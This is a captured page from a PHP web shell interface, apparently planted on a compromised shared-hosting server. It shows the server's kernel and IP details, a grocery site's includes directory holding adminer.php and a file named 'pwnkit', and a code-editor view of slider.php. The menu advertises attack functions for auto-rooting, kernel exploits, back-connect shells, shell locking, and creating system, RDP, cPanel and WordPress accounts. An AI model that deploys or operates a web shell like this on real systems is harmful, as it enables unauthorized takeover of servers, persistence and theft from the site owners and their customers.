Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.216.77
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
adminer.php
465.43
KB
-rw-r--r--
brands.php
615
B
-rw-r--r--
css.php
1.23
KB
-rw-r--r--
db_config.php
384
B
-rw-r--r--
delete_cart.php
284
B
-rw-r--r--
feature-product.php
2.36
KB
-rw-r--r--
feature-product1.php
7.04
KB
-rw-r--r--
footer.php
3
KB
-rw-r--r--
header.php
6.65
KB
-rw-r--r--
js.php
1.05
KB
-rw-r--r--
orderwhatsapp.php
452
B
-rw-r--r--
product-category.php
1.42
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
slider.php
473
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slider.php
<section class="carousel-slider-main text-center border-top border-bottom bg-white"> <div class="owl-carousel owl-carousel-slider"> <?php $sql_sl="SELECT * from slider"; $exe_sl=mysqli_query($conn,$sql_sl); while ($res_sl=mysqli_fetch_array($exe_sl)) { ?> <div class="item"> <a href="#"><img class="img-fluid" src="admin/banner/<?php echo $res_sl['image'];?>" alt="<?php echo $res_sl['name'];?>"></a> </div> <?php } ?> </div> </section>
Close